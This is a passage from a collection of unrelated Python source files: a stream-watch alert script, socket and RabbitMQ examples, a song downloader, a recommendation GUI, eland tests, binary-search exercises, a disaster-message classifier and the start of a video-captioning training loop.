to_result]","sub_path":"server/ross_vis/StreamAnalysis.py","file_name":"StreamAnalysis.py","file_ext":"py","file_size_in_byte":31281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"402760391","text":"import requests\r\nimport sys\r\nfrom PyQt4 import QtGui, QtCore\r\nfrom PyQt4.QtCore import pyqtSlot\r\nfrom PyQt4.QtGui import *\r\nfrom PyQt4.QtGui import QInputDialog, QLineEdit\r\nfrom subprocess import Popen\r\nimport time\r\nimport smtplib\r\nimport webbrowser\r\nfrom pynput.keyboard import Key, Controller\r\n\r\nmel = \"https://chaturbate.com/projektmelody/\"\r\nkeyboard = Controller()\r\nwhile True:\r\n url = requests.get(mel)\r\n\r\n if \"Room is currently offline\" in url.text:\r\n print(\"I miss melody....\")\r\n time.sleep(60)\r\n continue\r\n \r\n if True:\r\n keyboard.press(Key.alt)\r\n keyboard.press(Key.f4)\r\n keyboard.release(Key.alt)\r\n keyboard.release(Key.alt)\r\n \r\n class Window(QtGui.QMainWindow):\r\n\r\n def __init__(self):\r\n super(Window, self).__init__()\r\n self.setGeometry(400, 125, 1000, 750)\r\n self.setWindowTitle(\"ProjektMelody\")\r\n self.setWindowIcon(QtGui.QIcon('pythonlogo.png'))\r\n \r\n\r\n self.home()\r\n\r\n def home(self):\r\n btn = QtGui.QPushButton(\"Melody is Streaming!\", self)\r\n btn.clicked.connect(self.close_application)\r\n btn.resize(btn.minimumSizeHint())\r\n btn.setGeometry(235,135 , 500, 450)\r\n\r\n extractAction = QtGui.QAction(QtGui.QIcon('Melody.png'), 'Flee the Scene', self)\r\n extractAction.triggered.connect(self.close_application)\r\n \r\n \r\n self.show()\r\n\r\n def close_application(self):\r\n choice = QtGui.QMessageBox.question(self, 'Waifu Alert',\r\n \"Watch Stream?\",\r\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\r\n if choice == QtGui.QMessageBox.Yes:\r\n webbrowser.open_new(mel)\r\n sys.exit()\r\n else:\r\n pass\r\n\r\n \r\n def run():\r\n app = QtGui.QApplication(sys.argv)\r\n GUI = Window()\r\n sys.exit(app.exec_())\r\n\r\n\r\n run()\r\n \r\n print(\"Stream time!\")\r\n break\r\n","sub_path":"melody_beta.py","file_name":"melody_beta.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"353500762","text":"import socket\nimport select\n\nfrom typing import Tuple\n\n\ndef main() -> None:\n print(\"RECEIVER START\")\n\n print(\"bind receiver ...\")\n receiver = socket.socket(\n socket.AF_INET, # socket family\n socket.SOCK_STREAM, # socket type\n )\n\n HOST = \"0.0.0.0\"\n PORT = 5678\n receiver.bind((HOST, PORT,))\n receiver.listen()\n\n try:\n # wait for a connection\n while True:\n print(\"wait for accept ...\")\n sender_conn: socket.socket\n addr: Tuple[str, int]\n (sender_conn, addr,) = receiver.accept()\n print(f\"accepted! ({addr})\")\n\n # get messages from the connection\n while True:\n # --- IMPORTANT BIT ----\n print(\"Select ...\")\n (\n to_read, to_write, to_err\n ) = select.select([sender_conn], [], [sender_conn])\n\n msg = sender_conn.recv(1024)\n print(\"RECV\", msg)\n\n # if there are 0 bytes received\n # then the remote socket closed\n if len(msg) == 0:\n print(\"Client closed. Cleaning ...\")\n sender_conn.close()\n break\n\n except KeyboardInterrupt:\n print(\"\\nCtrl+C detected\")\n finally:\n print(\"Cleaning ...\")\n if sender_conn.fileno() > 0:\n print(\"Sender socket was still open. Closing ...\")\n sender_conn.close()\n receiver.close()\n\n print(\"RECEIVER STOP\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"networking/socket/s05_select/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"441764144","text":"class Solution:\n def queensAttacktheKing(self, queens: List[List[int]], king: List[int]) -> List[List[int]]:\n res = []\n directions = [[-1, 0], [1, 0], [0, 1], [0, -1], [1, 1], [1, -1], [-1, 1], [-1, -1]]\n for direction in directions:\n k = 1\n while 0 <= king[0] + k * direction[0] < 9 and 0 <= king[1] + k * direction[1] < 9:\n pos = [king[0] + k * direction[0], king[1] + k * direction[1]]\n if pos in queens:\n res.append(pos)\n break\n else:\n k += 1\n return res\n","sub_path":"Array/1222. Queens That Can Attack the King.py","file_name":"1222. Queens That Can Attack the King.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"569350158","text":"import sys\nimport time\nimport datetime\nimport pika\n\n\ndef pub(n_sec):\n start = datetime.datetime.now()\n cnt = 0\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n channel = connection.channel()\n channel.queue_declare(queue='hello') # queue 생성\n\n def pub_():\n channel.basic_publish(exchange='', routing_key='hello', body=str(time.time()),\n properties=pika.BasicProperties(timestamp=int(time.time())))\n\n while True:\n pub_()\n if datetime.datetime.now() > start + datetime.timedelta(seconds=n_sec):\n break\n cnt += 1\n print(f\"published {cnt / n_sec} msgs\")\n\n\n\n\n\nif __name__ == '__main__':\n\n pub(10)","sub_path":"rabbitMQ/rabbit_pub_throughput.py","file_name":"rabbit_pub_throughput.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"479317419","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport json\r\nimport os\r\n\r\n# 获取目录\r\ndir_path = os.getcwd()\r\nprint(dir_path)\r\n\r\nsong_path = dir_path + \"/download_songs/\"\r\n\r\nurl_path = dir_path + \"/url.txt\"\r\n\r\n\r\ndef get_json(url):\r\n data = urllib.request.urlopen(url.decode('ASCII')).read().decode('UTF-8') # 爬取网页的响应数据,使用utf-8重新编码\r\n\r\n # print(data) # 打印处理过的响应数据\r\n\r\n soup = BeautifulSoup(data, \"lxml\") # 返回BeautifulSoup对象,使用lxml解析器\r\n\r\n target_info_str = str(soup.findAll('script')[-6].get_text())[18:-2] # 找到对应我们目标标签中的json内容\r\n\r\n # print(target_info_str) # 打印目标信息json\r\n\r\n json_dic = json.loads(target_info_str) # 将json信息转化为python字典\r\n\r\n # print(json_dic['shareid']) # 打印字典中键为shareid的值,测试是否成功\r\n\r\n # json格式化后转化为字符串\r\n dumped_json_data = json.dumps(json_dic, sort_keys=True, indent=4, separators=(',', ':'), ensure_ascii=False)\r\n\r\n # 打印格式化后的字符串\r\n # print(dumped_json_data)\r\n\r\n file_url = json_dic['detail']['playurl']\r\n\r\n # 打印我们最终需求的下载地址\r\n # print(file_url)\r\n\r\n # 更改fname进行重命名,默认更改为用户昵称+歌曲名称+后缀(.m4a)\r\n\r\n # 先获取用户昵称\r\n user_name = json_dic['detail']['nick']\r\n\r\n # 再获取歌曲名称\r\n song_name = json_dic['detail']['song_name']\r\n\r\n # 得到默认文件名\r\n file_name_normal = user_name + \"_\" + song_name + \".m4a\"\r\n\r\n # 打印默认文件名\r\n print(file_name_normal)\r\n\r\n # 返回参数\r\n return file_url, file_name_normal\r\n\r\n\r\ndef download_song(file_url, file_name_normal):\r\n # 下载文件到main.py同级目录\r\n print(\"下载中\")\r\n f = urllib.request.urlopen(file_url)\r\n with open(song_path + file_name_normal, \"wb\") as code:\r\n code.write(f.read())\r\n print(\"下载成功\")\r\n\r\n\r\nwith open(url_path, \"rb\") as url_txt:\r\n urls = url_txt.read().splitlines()\r\n for url_meta in urls:\r\n print(url_meta)\r\n file_url_meta, file_name_normal_meta = get_json(url_meta)\r\n download_song(file_url_meta, file_name_normal_meta)\r\n # file_name, file_name_normal = get_json(url_txt_name)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"src/linux_main.py","file_name":"linux_main.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"310853000","text":"from tkinter import *\r\nimport pickle\r\nglobal fur\r\nglobal q\r\n\r\n# loading dumped datafiles\r\nfur = sorted(pickle.load(open(\"fur1.p\", \"rb\")))\r\noff = sorted(pickle.load(open(\"off1.p\", \"rb\")))\r\ntec = sorted(pickle.load(open(\"tec1.p\", \"rb\")))\r\nproduct = pickle.load(open(\"Product_Recommendation.p\", \"rb\"))\r\ndata = pickle.load(open(\"4yrsBMW.p\", \"rb\"))\r\ndata = data[:370]\r\n\r\n# window configuration\r\nroot = Tk()\r\nroot.title(\"Personalized Experience (Product Recommendation)\")\r\nroot.configure(background='#7E85AB')\r\nroot.geometry(\"900x600\")\r\nroot.resizable(0,0)\r\n\r\n\r\n#Function to return furniture products\r\ndef doprintfur(val):\r\n \r\n print(fu.get())\r\n #listb = Listbox(root, width = 40, height = 15)\r\n \r\n for i in range(len(data['d_product'])):\r\n if data['d_product'][i] == fu.get():\r\n print(i)\r\n Recommendations=[]\r\n for u in range(len(product[i])):\r\n if (product[i]['score'][u] > 0):\r\n Recommendations.append(product[i]['item2'][u])\r\n print(\"\\n\\n Recommendations for\",data['d_product'][i],\" \\n\",Recommendations[:5])\r\n listb.delete(0, END)\r\n b = 1\r\n Recommendations= sorted(Recommendations[:5])\r\n for a in Recommendations[:5]:\r\n listb.insert(END, '{}. {}'.format(b, a))\r\n b+=1\r\n#Function to return Office products \r\ndef doprintoff(val):\r\n \r\n print(of.get())\r\n #listb = Listbox(root, width = 40, height = 15)\r\n \r\n for i in range(len(data['d_product'])):\r\n if data['d_product'][i] == of.get():\r\n print(i)\r\n Recommendations=[]\r\n for u in range(len(product[i])):\r\n if (product[i]['score'][u] > 0):\r\n Recommendations.append(product[i]['item2'][u])\r\n print(\"\\n\\n Recommendations for\",data['d_product'][i],\" \\n\",Recommendations[:5])\r\n listb.delete(0, END)\r\n b = 1\r\n Recommendations= sorted(Recommendations[:5])\r\n for a in Recommendations[:5]:\r\n listb.insert(END, '{}. {}'.format(b, a))\r\n b+=1\r\n\r\n#Function to return Technology products\r\ndef doprinttec(val):\r\n global Recommendations\r\n Recommendations = []\r\n print(te.get())\r\n #listb = Listbox(root, width = 40, height = 15)\r\n \r\n for i in range(len(data['d_product'])):\r\n if data['d_product'][i] == te.get():\r\n print(i)\r\n for u in range(len(product[i])):\r\n if (product[i]['score'][u] > 0):\r\n Recommendations.append(product[i]['item2'][u])\r\n print(\"\\n\\n Recommendations for\",data['d_product'][i],\" \\n\",Recommendations[:5])\r\n listb.delete(0, END)\r\n b = 1\r\n Recommendations= sorted(Recommendations[:5])\r\n for a in Recommendations[:5]:\r\n listb.insert(END, '{}. {}'.format(b, a))\r\n b+=1\r\n\r\ntoprec = Label(root, text = 'Top 5 recommendations : ', background='#7E85AB', fg = 'white')\r\ntoprec.place(relx = 0.35, rely = 0.36)\r\n \r\nlistb = Listbox(root, width = 80, height = 5)\r\nlistb.place(relx = 0.2, rely = 0.4)\r\n\r\nfurLabel = Label(root,text='Furniture Products : ', background='#7E85AB', fg = 'white')\r\nfurLabel.place(relx = 0.05, rely = 0.09)\r\n\r\nfu = StringVar(root)\r\nfu.set(fur[0])\r\nfurDropdown = OptionMenu(root, fu,*fur, command=doprintfur)\r\nfurDropdown.configure(width = '30', anchor = 'w')\r\nfurDropdown.place(relx = 0.05, rely = 0.12)\r\n\r\noffLabel = Label(root,text='Office Products : ', background='#7E85AB', fg = 'white')\r\noffLabel.place(relx = 0.37, rely = 0.09)\r\n\r\nof = StringVar(root)\r\nof.set(off[0])\r\noffDropdown = OptionMenu(root, of,*off, command=doprintoff)\r\noffDropdown.configure(width = '30', anchor = 'w')\r\noffDropdown.place(relx = 0.37, rely = 0.12)\r\n\r\ntecLabel = Label(root,text='Technology Products : ', background='#7E85AB', fg = 'white')\r\ntecLabel.place(relx = 0.70, rely = 0.09)\r\n\r\nte = StringVar(root)\r\nte.set(tec[0])\r\ntecDropdown = OptionMenu(root, te,*tec, command=doprinttec)\r\ntecDropdown.configure(width = '30', anchor = 'w')\r\ntecDropdown.place(relx = 0.70, rely = 0.12)\r\n\r\nroot.mainloop()\r\n","sub_path":"GUI/personalised_gui.py","file_name":"personalised_gui.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"443102425","text":"# Licensed to Elasticsearch B.V under one or more agreements.\n# Elasticsearch B.V licenses this file to you under the Apache 2.0 License.\n# See the LICENSE file in the project root for more information\n\n# File called _pytest for PyCharm compatability\nimport pytest\n\nfrom eland.field_mappings import FieldMappings\nfrom eland.tests import ES_TEST_CLIENT, ECOMMERCE_INDEX_NAME\nfrom eland.tests.common import TestData\n\n\nclass TestAggregatables(TestData):\n @pytest.mark.filterwarnings(\"ignore:Aggregations not supported\")\n def test_ecommerce_all_aggregatables(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n aggregatables = ed_field_mappings.aggregatable_field_names()\n\n expected = {\n \"category.keyword\": \"category\",\n \"currency\": \"currency\",\n \"customer_birth_date\": \"customer_birth_date\",\n \"customer_first_name.keyword\": \"customer_first_name\",\n \"customer_full_name.keyword\": \"customer_full_name\",\n \"customer_id\": \"customer_id\",\n \"customer_last_name.keyword\": \"customer_last_name\",\n \"customer_phone\": \"customer_phone\",\n \"day_of_week\": \"day_of_week\",\n \"day_of_week_i\": \"day_of_week_i\",\n \"email\": \"email\",\n \"geoip.city_name\": \"geoip.city_name\",\n \"geoip.continent_name\": \"geoip.continent_name\",\n \"geoip.country_iso_code\": \"geoip.country_iso_code\",\n \"geoip.location\": \"geoip.location\",\n \"geoip.region_name\": \"geoip.region_name\",\n \"manufacturer.keyword\": \"manufacturer\",\n \"order_date\": \"order_date\",\n \"order_id\": \"order_id\",\n \"products._id.keyword\": \"products._id\",\n \"products.base_price\": \"products.base_price\",\n \"products.base_unit_price\": \"products.base_unit_price\",\n \"products.category.keyword\": \"products.category\",\n \"products.created_on\": \"products.created_on\",\n \"products.discount_amount\": \"products.discount_amount\",\n \"products.discount_percentage\": \"products.discount_percentage\",\n \"products.manufacturer.keyword\": \"products.manufacturer\",\n \"products.min_price\": \"products.min_price\",\n \"products.price\": \"products.price\",\n \"products.product_id\": \"products.product_id\",\n \"products.product_name.keyword\": \"products.product_name\",\n \"products.quantity\": \"products.quantity\",\n \"products.sku\": \"products.sku\",\n \"products.tax_amount\": \"products.tax_amount\",\n \"products.taxful_price\": \"products.taxful_price\",\n \"products.taxless_price\": \"products.taxless_price\",\n \"products.unit_discount_amount\": \"products.unit_discount_amount\",\n \"sku\": \"sku\",\n \"taxful_total_price\": \"taxful_total_price\",\n \"taxless_total_price\": \"taxless_total_price\",\n \"total_quantity\": \"total_quantity\",\n \"total_unique_products\": \"total_unique_products\",\n \"type\": \"type\",\n \"user\": \"user\",\n }\n\n assert expected == aggregatables\n\n def test_ecommerce_selected_aggregatables(self):\n expected = {\n \"category.keyword\": \"category\",\n \"currency\": \"currency\",\n \"customer_birth_date\": \"customer_birth_date\",\n \"customer_first_name.keyword\": \"customer_first_name\",\n \"type\": \"type\",\n \"user\": \"user\",\n }\n\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT,\n index_pattern=ECOMMERCE_INDEX_NAME,\n display_names=expected.values(),\n )\n\n aggregatables = ed_field_mappings.aggregatable_field_names()\n\n assert expected == aggregatables\n\n def test_ecommerce_single_aggregatable_field(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n assert \"user\" == ed_field_mappings.aggregatable_field_name(\"user\")\n\n def test_ecommerce_single_keyword_aggregatable_field(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n assert (\n \"customer_first_name.keyword\"\n == ed_field_mappings.aggregatable_field_name(\"customer_first_name\")\n )\n\n def test_ecommerce_single_non_existant_field(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n with pytest.raises(KeyError):\n ed_field_mappings.aggregatable_field_name(\"non_existant\")\n\n @pytest.mark.filterwarnings(\"ignore:Aggregations not supported\")\n def test_ecommerce_single_non_aggregatable_field(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n assert None is ed_field_mappings.aggregatable_field_name(\"customer_gender\")\n","sub_path":"eland/tests/field_mappings/test_aggregatables_pytest.py","file_name":"test_aggregatables_pytest.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"38622455","text":"#!/bin/python3\n\nimport random\n\ndef find_smallest_positive(xs):\n '''\n Assume that xs is a list of numbers sorted from LOWEST to HIGHEST.\n Find the index of the smallest positive number.\n If no such index exists, return `None`.\n\n HINT: \n This is essentially the binary search algorithm from class,\n but you're always searching for 0.\n\n >>> find_smallest_positive([-3, -2, -1, 0, 1, 2, 3])\n 4\n >>> find_smallest_positive([1, 2, 3])\n 0\n >>> find_smallest_positive([-3, -2, -1]) is None\n True\n '''\n left = 0\n right = len(xs)-1\n\n def go(left,right):\n mid = (left+right)//2\n\n if len(xs) == 0:\n return None\n if xs[left] > 0:\n return left\n if xs[right] < 0:\n return None\n if xs[mid] > 0:\n right = mid -1\n if xs[mid] < 0:\n left = mid+1\n if xs[mid] == 0:\n return mid+1\n\n return go(left,right)\n return go(left,right)\n\ndef _included(xs, x):\n '''\n >>> _included([5,4,3,3,3,3,3,3,3,2,1], 3)\n True\n >>> _included([1,2,3], 4)\n False\n '''\n left =0\n right = len(xs)-1\n \n if len(xs) == 0:\n return False\n\n def go(left,right):\n mid = (left+right)//2\n \n if right == left and xs[right] != x:\n return False\n if x > xs[mid]:\n right = mid-1\n return go(left,right)\n elif x < xs[mid]:\n left = mid+1\n return go(left,right)\n else:\n return True\n return go(left,right)\n\ndef _small_lowest_index(xs,x):\n '''\n >>> _small_lowest_index([5,4,3,3,3,3,3,3,3,2,1], 3)\n 2\n >>> _small_lowest_index([1,2,3], 4)\n 0\n '''\n left = 0\n right = len(xs)-1\n \n def go(left,right):\n mid = (left+right)//2\n \n if x > xs[mid]:\n right = mid-1\n return go(left,right)\n elif x < xs[mid]:\n left = mid+1\n return go(left,right)\n else:\n right = mid-1\n if xs[mid-1]!=x or mid == 0:\n return mid\n else:\n return go(left,right)\n # return go(left,right)\n # return go(left,right)\n return go(left, right)\n\n\ndef _big_lowest_index(xs,x):\n '''\n >>> _big_lowest_index([5,4,3,3,3,3,3,3,3,2,1], 3)\n 8\n >>> _big_lowest_index([1,2,3], 4)\n 0\n '''\n left = 0\n right = len(xs)-1\n \n def go(left,right):\n mid = (left+right)//2\n \n if x > xs[mid]:\n right = mid-1\n return go(left,right)\n\n elif x < xs[mid]:\n left = mid+1\n return go(left,right)\n else:\n \n left = mid+1\n if mid == (len(xs)-1) or xs[mid+1]!= x:\n return mid\n else:\n return go(left,right)\n # return go(left,right)\n # return go(left,right)\n return go(left, right)\n \n\ndef count_repeats(xs, x):\n '''\n Assume that xs is a list of numbers sorted from HIGHEST to LOWEST,\n and that x is a number.\n Calculate the number of times that x occurs in xs.\n\n HINT: \n Use the following three step procedure:\n 1) use binary search to find the lowest index with a value >= x\n 2) use binary search to find the lowest index with a value < x\n 3) return the difference between step 1 and 2\n\n I highly recommend creating stand-alone functions for steps 1 and 2\n that you can test independently.\n\n >>> count_repeats([5, 4, 3, 3, 3, 3, 3, 3, 3, 2, 1], 3)\n 7\n >>> count_repeats([1, 2, 3], 4)\n 0\n '''\n \n\n if _included(xs, x):\n high = _big_lowest_index(xs, x)\n small = _small_lowest_index(xs, x)\n return (high - small) + 1\n else:\n return 0\n \n \n\n\ndef argmin(f, lo, hi, epsilon=1e-3):\n '''\n Assumes that f is an input function that takes a float as input and returns a float with a unique global minimum,\n and that lo and hi are both floats satisfying lo < hi.\n Returns a number that is within epsilon of the value that minimizes f(x) over the interval [lo,hi]\n\n HINT:\n The basic algorithm is:\n 1) The base case is when hi-lo < epsilon\n 2) For each recursive call:\n a) select two points m1 and m2 that are between lo and hi\n b) one of the 4 points (lo,m1,m2,hi) must be the smallest;\n depending on which one is the smallest, \n you recursively call your function on the interval [lo,m2] or [m1,hi]\n\n >>> argmin(lambda x: (x-5)**2, -20, 20)\n 5.000040370009773\n >>> argmin(lambda x: (x-5)**2, -20, 0)\n -0.00016935087808430278\n '''\n \n if hi - lo < epsilon:\n return (lo+hi)/2\n else:\n m1 = lo + (hi-lo)/4\n\n m2 = hi - (hi-lo)/2\n \n if f(m1) < f(m2):\n return argmin(f, lo, m2, epsilon)\n\n else:\n return argmin(f, m1, hi, epsilon)\n","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"209983681","text":"import sys\nimport nltk\nnltk.download(['punkt','wordnet','averaged_perceptron_tagger','stopwords'])\n\n# import libraries\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk import pos_tag\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.naive_bayes import BernoulliNB\n\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.metrics import fbeta_score,classification_report,make_scorer\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nimport sklearn.externals.joblib as extjoblib\nimport joblib\nimport re\nimport pandas as pd\nimport sqlite3\nimport numpy as np\n\n\ndef load_data(database_filepath):\n '''\n Input: database_filepath(Provided in the main function)\n This load the data produced in data/process_data.py file. Also returns X, y and category names to be used for\n train test split\n Output: X, y, categor_names\n '''\n # Load dataset from database \n db = sqlite3.connect('data/messages_categories.db')\n cursor = db.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables = cursor.fetchall()[0][0]\n df = pd.read_sql_query('SELECT * FROM '+tables,db)\n\n print(df)\n\n X = df['message']\n y = df[df.columns[4:]]\n category_names = list(df.columns[4:])\n\n print(y)\n\n return X, y, category_names\n\ndef tokenize(text):\n '''\n Input: Messages from X\n\n Output: tokenized and lemmetize text for improved model\n\n '''\n # normalize text and remove punctuation\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text.lower())\n \n # tokenize text\n tokens = word_tokenize(text)\n stop_words = stopwords.words(\"english\")\n words = [w for w in tokens if w not in stop_words]\n \n # Reduce words to their root form\n lemmatizer = WordNetLemmatizer()\n lemmed = [lemmatizer.lemmatize(w) for w in words]\n \n return lemmed\n\n\ndef build_model(X, y):\n '''\n Input: X_train, y_train = from train test split in main function\n\n Output: Model using the pipeline and best parameters using grid search\n '''\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf',MultiOutputClassifier(RandomForestClassifier())),\n ])\n\n \n parameters = {\n 'vect__max_df': (0.5, 0.75, 1.0),\n 'vect__ngram_range': ((1, 1), (1,2)),\n 'vect__max_features': (None, 5000,10000),\n 'tfidf__use_idf': (True, False)\n }\n\n gs_clf = GridSearchCV(pipeline, param_grid=parameters)\n\n return gs_clf\n\ndef evaluate_model(model, X_test, y_test, category_names):\n #see the score for each category\n y_pred = model.predict(X_test)\n y_pred_pd = pd.DataFrame(y_pred, columns = y_test.columns)\n for column in y_test.columns:\n print('------------------------------------------------------\\n')\n print('Category: {}\\n'.format(column))\n print(classification_report(y_test[column],y_pred_pd[column]))\n\ndef save_model(model, model_filepath):\n #save the model as a pkl file\n joblib.dump(model.best_estimator_, model_filepath)\n\n\ndef main():\n \"\"\"\"\n Input in the cmd: 'python models/train_classifier.py data/messages_categories.db models/model1.pkl'\n ***[1] python models/train_classifier.py - to run the program\n ***[2] data/messages_categories.db: Database that was profduced by data/process_data.py\n ***[3] models/model1.pkl: Pickle file that will be prodcued by this program(models/train_classifier.py)\n \"\"\"\n if len(sys.argv) == 3:\n database_filepath, model_filepath = sys.argv[1:]\n \n print('Loading data...\\n DATABASE: {}'.format(database_filepath))\n X, y, category_names = load_data(database_filepath)\n\n print(X, y, category_names)\n X_train, X_test, y_train, y_test = train_test_split(X, y)\n \n print('Building model...')\n model = build_model(X, y)\n\n print('Training model...')\n model.fit(X_train, y_train) \n \n print('Evaluating model...')\n evaluate_model(model, X_test, y_test, category_names)\n\n print('Saving model...\\n MODEL: {}'.format(model_filepath))\n save_model(model, model_filepath)\n\n print('Trained model saved!')\n\n else:\n print('Please provide the filepath of the disaster messages database '\\\n 'as the first argument and the filepath of the pickle file to '\\\n 'save the model to as the second argument. \\n\\nExample: python '\\\n 'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\nif __name__ == '__main__':\n main()","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"197648255","text":"''' Training Scropt for V2C captioning task. '''\r\n\r\nimport os\r\nimport numpy as np\r\nfrom opts import *\r\nfrom utils.utils import *\r\nimport torch.optim as optim\r\nfrom model.Model import HybirdNet as Model\r\nfrom torch.utils.data import DataLoader\r\nfrom utils.dataloader import VideoDataset\r\nfrom model.transformer.Optim import ScheduledOptim\r\nimport torch\r\n\r\ndef train(loader, model, optimizer, opt, cap_vocab, cms_vocab):\r\n\r\n model.train()\r\n\r\n for epoch in range(1, opt['epochs']+1):\r\n iteration = 0\r\n cap_n_correct_total = 0\r\n cms_int_n_correct_total = 0\r\n cms_eff_n_correct_total = 0\r\n cms_att_n_correct_total = 0\r\n n_word_total = 0\r\n cms_int_n_word_total = 0\r\n cms_eff_n_word_total = 0\r\n cms_att_n_word_total = 0\r\n cap_train_loss_total = 0\r\n cms_int_train_loss_total = 0\r\n cms_eff_train_loss_total = 0\r\n cms_att_train_loss_total = 0\r\n\r\n for data in loader:\r\n torch.cuda.synchronize()\r\n\r\n cms_labels_int = data['int_labels']\r\n cms_labels_eff = data['eff_labels']\r\n cms_labels_att = data['att_labels']\r\n\r\n if opt['cuda']:\r\n fc_feats = data['fc_feats'].cuda()\r\n i3d = data['i3d'].cuda()\r\n audio = data['audio'].cuda()\r\n cap_labels = data['cap_labels'].cuda()\r\n cms_labels_int = cms_labels_int.cuda()\r\n cms_labels_eff = cms_labels_eff.cuda()\r\n cms_labels_att = cms_labels_att.cuda()\r\n\r\n optimizer.zero_grad()\r\n cap_pos = pos_emb_generation(cap_labels)\r\n cms_pos_int = pos_emb_generation(cms_labels_int)\r\n cms_pos_eff = pos_emb_generation(cms_labels_eff)\r\n cms_pos_att = pos_emb_generation(cms_labels_att)\r\n\r\n\r\n cap_probs, cms_int_probs, cms_eff_probs, cms_att_probs = model(fc_feats, i3d, audio, cap_labels, cap_pos, cms_labels_int, cms_pos_int,\r\n cms_labels_eff, cms_pos_eff, cms_labels_att, cms_pos_att)\r\n\r\n # note: currently we just used most naive cross-entropy as training objective,\r\n # advanced loss func. like SELF-CRIT, different loss weights or stronger video feature\r\n # may lead performance boost, however is not the goal of this work.\r\n cap_loss, cap_n_correct = cal_performance(cap_probs, cap_labels[:, 1:], smoothing=True)\r\n cms_int_loss, cms_int_n_correct = cal_performance(cms_int_probs, cms_labels_int[:, 1:], smoothing=True)\r\n cms_eff_loss, cms_eff_n_correct = cal_performance(cms_eff_probs, cms_labels_eff[:, 1:], smoothing=True)\r\n cms_att_loss, cms_att_n_correct = cal_performance(cms_att_probs, cms_labels_att[:, 1:], smoothing=True)\r\n\r\n # compute the token prediction Acc.\r\n non_pad_mask = cap_labels[:, 1:].ne(Constants.PAD)\r\n n_word = non_pad_mask.sum().item()\r\n\r\n cms_int_non_pad_mask = cms_labels_int[:, 1:].ne(Constants.PAD)\r\n cms_int_n_word = cms_int_non_pad_mask.sum().item()\r\n\r\n cms_eff_non_pad_mask = cms_labels_eff[:, 1:].ne(Constants.PAD)\r\n cms_eff_n_word = cms_eff_non_pad_mask.sum().item()\r\n\r\n cms_att_non_pad_mask = cms_labels_att[:, 1:].ne(Constants.PAD)\r\n cms_att_n_word = cms_att_non_pad_mask.sum().item()\r\n\r\n cap_loss /= n_word\r\n cms_int_loss /= cms_int_n_word\r\n cms_eff_loss /= cms_eff_n_word\r\n cms_att_loss /= cms_att_n_word\r\n\r\n loss = cap_loss + cms_int_loss + cms_eff_loss + cms_att_loss\r\n\r\n loss.backward()\r\n optimizer.step_and_update_lr()\r\n torch.nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), 1)\r\n\r\n # update parameters\r\n cap_train_loss = cap_loss.item()\r\n cms_int_train_loss = cms_int_loss.item()\r\n cms_eff_train_loss = cms_eff_loss.item()\r\n cms_att_train_loss = cms_att_loss.item()\r\n\r\n # multi-gpu case, not necessary in newer PyTorch version or on single GPU.\r\n if opt['cuda']: 